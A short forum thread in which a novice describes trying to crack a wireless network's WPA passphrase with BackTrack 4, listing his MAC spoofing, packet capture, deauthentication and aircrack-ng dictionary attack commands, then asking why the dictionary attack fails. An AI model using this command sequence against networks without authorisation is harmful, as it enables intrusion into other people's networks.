Thread: Passphrase not in dictionary???!?!?

Hybrid View

Just burned his ISO

Default Passphrase not in dictionary???!?!?

Hey.

I'm a newbie, just spent a lot of hours trying to hack a wireless network. I'm using a BackTrack 4 iso live cd to boot in BackTrack 4. I've spent a lot of hours to read a lot of "how to" guides, and I finally figured out how to do it. But when aircrack startet to "hack" the password, it just said "Passphare not in dictionary" after it tested 270 keys.

This is what i do:
    airmon-ng stop wlan0
    ifconfig wlan0 down
    macchanger --mac 00:11:22:33:44:55 wlan0
    airmon-ng start wlan0
    airodump-ng wlan0

# then i choose a taget (channel, bssid, essid) #

airodump-ng -c 11 -w wpa -bssid 00:26:18:90:1D:4D wlan0

# then i open another shell #

aireplay-ng -0 5 -a 00:26:18:90:1D:4D wlan0

# then i get a WPA handshake #

aircrack-ng wpa-01.cap -w /pentest/wireless/aircrack-ng/test/password.lst

then aircrack starts propper, i think, and tests about 270 keys in less than 1 sec, and then it says: Passphrase not i dictionary quitting aircrack

What do i have to do?

Rasmus

Just burned his ISO

Default ..

Okay, now i found a password list with about 1 million passwords, and the aircrack ran for about 3 hours, but still didn't find the key? Is it possible to find a WPA key ???

Just burned his ISO

Default hmm..